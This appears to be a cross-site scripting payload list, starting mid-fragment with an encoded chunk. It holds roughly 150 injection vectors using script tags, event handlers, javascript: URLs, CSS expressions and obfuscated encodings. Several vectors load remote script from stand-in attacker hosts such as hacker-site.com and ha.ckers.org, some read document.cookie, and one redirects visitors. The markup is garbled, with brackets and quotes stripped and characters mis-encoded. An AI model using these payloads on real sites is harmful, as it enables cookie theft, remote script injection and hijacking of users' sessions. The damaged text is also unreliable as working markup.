0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e);/img
/body
/html
SCRIPT SRChttp://hacker-site.com/xss.js/SCRIPT
SCRIPT alert(ÄËĂÂĂÂXSSÄËĂÂĂÂ); /SCRIPT
BODY ONLOADalert(XSS)
BODY BACKGROUNDjavascript:alert(XSS)
IMG SRCjavascript:alert(XSS);
IMG DYNSRCjavascript:alert(XSS)
IMG LOWSRCjavascript:alert(XSS)
IFRAME SRCÄËĂÂĂÂhttp://hacker-site.com/xss.htmlÄËĂÂĂÂ
INPUT TYPEIMAGE SRCjavascript:alert(XSS);
LINK RELstylesheet HREFjavascript:alert(XSS);
TABLE BACKGROUNDjavascript:alert(XSS)
TD BACKGROUNDjavascript:alert(XSS)
DIV STYLEbackground-image: url(javascript:alert(XSS))
DIV STYLEwidth: expression(alert(XSS));
OBJECT TYPEtext/x-scriptlet DATAhttp://hacker.com/xss.html
EMBED SRChttp://hacker.com/xss.swf AllowScriptAccessalways
;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//--/SCRIPTSCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT
;!--XSS{()}
SCRIPTalert(XSS)/SCRIPT
SCRIPT SRChttp://ha.ckers.org/xss.js/SCRIPT
SCRIPTalert(String.fromCharCode(88,83,83))/SCRIPT
BASE HREFjavascript:alert(XSS);//
BGSOUND SRCjavascript:alert(XSS);
BODY BACKGROUNDjavascript:alert(XSS);
BODY ONLOADalert(XSS)
DIV STYLEbackground-image: url(javascript:alert(XSS))
DIV STYLEbackground-image: url(#1;javascript:alert(XSS))
DIV STYLEwidth: expression(alert(XSS));
%253Cscript%253Ealert(XSS)%253C%252Fscript%253E
IMG SRCx onloadalert(String.fromCharCode(88,83,83))
IMG SRCx onafterprintalert(String.fromCharCode(88,83,83))
IMG SRCx onbeforeprintalert(String.fromCharCode(88,83,83))
IMG SRCx onbeforeunloadalert(String.fromCharCode(88,83,83))
IMG SRCx onerroralert(String.fromCharCode(88,83,83))
IMG SRCx onhashchangealert(String.fromCharCode(88,83,83))
IMG SRCx onloadalert(String.fromCharCode(88,83,83))
IMG SRCx onmessagealert(String.fromCharCode(88,83,83))
IMG SRCx ononlinealert(String.fromCharCode(88,83,83))
IMG SRCx onofflinealert(String.fromCharCode(88,83,83))
IMG SRCx onpagehidealert(String.fromCharCode(88,83,83))
IMG SRCx onpageshowalert(String.fromCharCode(88,83,83))
IMG SRCx onpopstatealert(String.fromCharCode(88,83,83))
IMG SRCx onresizealert(String.fromCharCode(88,83,83))
IMG SRCx onstoragealert(String.fromCharCode(88,83,83))
IMG SRCx onunloadalert(String.fromCharCode(88,83,83))
IMG SRCx onbluralert(String.fromCharCode(88,83,83))
IMG SRCx onchangealert(String.fromCharCode(88,83,83))
IMG SRCx oncontextmenualert(String.fromCharCode(88,83,83))
IMG SRCx oninputalert(String.fromCharCode(88,83,83))
IMG SRCx oninvalidalert(String.fromCharCode(88,83,83))
IMG SRCx onresetalert(String.fromCharCode(88,83,83))
IMG SRCx onsearchalert(String.fromCharCode(88,83,83))
IMG SRCx onselectalert(String.fromCharCode(88,83,83))
IMG SRCx onsubmitalert(String.fromCharCode(88,83,83))
IMG SRCx onkeydownalert(String.fromCharCode(88,83,83))
IMG SRCx onkeypressalert(String.fromCharCode(88,83,83))
IMG SRCx onkeyupalert(String.fromCharCode(88,83,83))
IMG SRCx onclickalert(String.fromCharCode(88,83,83))
IMG SRCx ondblclickalert(String.fromCharCode(88,83,83))
IMG SRCx onmousedownalert(String.fromCharCode(88,83,83))
IMG SRCx onmousemovealert(String.fromCharCode(88,83,83))
IMG SRCx onmouseoutalert(String.fromCharCode(88,83,83))
IMG SRCx onmouseoveralert(String.fromCharCode(88,83,83))
IMG SRCx onmouseupalert(String.fromCharCode(88,83,83))
IMG SRCx onmousewheelalert(String.fromCharCode(88,83,83))
IMG SRCx onwheelalert(String.fromCharCode(88,83,83))
IMG SRCx ondragalert(String.fromCharCode(88,83,83))
IMG SRCx ondragendalert(String.fromCharCode(88,83,83))
IMG SRCx ondragenteralert(String.fromCharCode(88,83,83))
IMG SRCx ondragleavealert(String.fromCharCode(88,83,83))
IMG SRCx ondragoveralert(String.fromCharCode(88,83,83))
IMG SRCx ondragstartalert(String.fromCharCode(88,83,83))
IMG SRCx ondropalert(String.fromCharCode(88,83,83))
IMG SRCx onscrollalert(String.fromCharCode(88,83,83))
IMG SRCx oncopyalert(String.fromCharCode(88,83,83))
IMG SRCx oncutalert(String.fromCharCode(88,83,83))
IMG SRCx onpastealert(String.fromCharCode(88,83,83))
IMG SRCx onabortalert(String.fromCharCode(88,83,83))
IMG SRCx oncanplayalert(String.fromCharCode(88,83,83))
IMG SRCx oncanplaythroughalert(String.fromCharCode(88,83,83))
IMG SRCx oncuechangealert(String.fromCharCode(88,83,83))
IMG SRCx ondurationchangealert(String.fromCharCode(88,83,83))
IMG SRCx onemptiedalert(String.fromCharCode(88,83,83))
IMG SRCx onendedalert(String.fromCharCode(88,83,83))
IMG SRCx onerroralert(String.fromCharCode(88,83,83))
IMG SRCx onloadeddataalert(String.fromCharCode(88,83,83))
IMG SRCx onloadedmetadataalert(String.fromCharCode(88,83,83))
IMG SRCx onloadstartalert(String.fromCharCode(88,83,83))
IMG SRCx onpausealert(String.fromCharCode(88,83,83))
IMG SRCx onplayalert(String.fromCharCode(88,83,83))
IMG SRCx onplayingalert(String.fromCharCode(88,83,83))
IMG SRCx onprogressalert(String.fromCharCode(88,83,83))
IMG SRCx onratechangealert(String.fromCharCode(88,83,83))
IMG SRCx onseekedalert(String.fromCharCode(88,83,83))
IMG SRCx onseekingalert(String.fromCharCode(88,83,83))
IMG SRCx onstalledalert(String.fromCharCode(88,83,83))
IMG SRCx onsuspendalert(String.fromCharCode(88,83,83))
IMG SRCx ontimeupdatealert(String.fromCharCode(88,83,83))
IMG SRCx onvolumechangealert(String.fromCharCode(88,83,83))
IMG SRCx onwaitingalert(String.fromCharCode(88,83,83))
IMG SRCx onshowalert(String.fromCharCode(88,83,83))
IMG SRCx ontogglealert(String.fromCharCode(88,83,83))
META onpaonpageonpagonpageonpageshowshoweshowshowgeshowalert(1);
IMG SRCx onloadalert(String.fromCharCode(88,83,83))
INPUT TYPEBUTTON actionalert(XSS)/
h1IFRAME SRCjavascript:alert(XSS);/IFRAME123/h1
h1IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME123/h1
IFRAME SRCjavascript:alert(XSS);/IFRAME
IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME
h1IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME123/h1
/iframescriptalert(TEXT YOU WANT TO BE DISPLAYED);/scriptiframe frameborder0%EF%BB%BF
h1IFRAME width420 height315 SRChttp://www.youtube.com/embed/sxvccpasgTE frameborder0 onmouseoveralert(document.cookie)/IFRAME123/h1
h1iframe width420 height315 srchttp://www.youtube.com/embed/sxvccpasgTE frameborder0 allowfullscreen/iframe123/h1
h1IFRAME width420 height315 frameborder0 onmouseoverdocument.location.hrefhttps://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
g/IFRAMEHover the cursor to the LEFT of this Message/h1ParamHeight250
IFRAME width420 height315 frameborder0 onloadalert(document.cookie)/IFRAME
h1IFRAME SRCjavascript:alert(XSS);/IFRAME123/h1
h1IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME123/h1
iframe srchttp://xss.rocks/scriptlet.html
IFRAME SRCjavascript:alert(XSS);/IFRAME
IFRAME SRC# onmouseoveralert(document.cookie)/IFRAME
iframe src javascript:prompt(1)
svgstyle{font-family:iframe/onloadconfirm(1)
input/onmouseoverjavaSCRIPT:confirm(1)
sVgscRipt alert(1) {Opera}
img/src onerrorthis.onerrorconfirm(1)
formisindex formactionjavascript:confirm(1)
img src onerroralert(1)
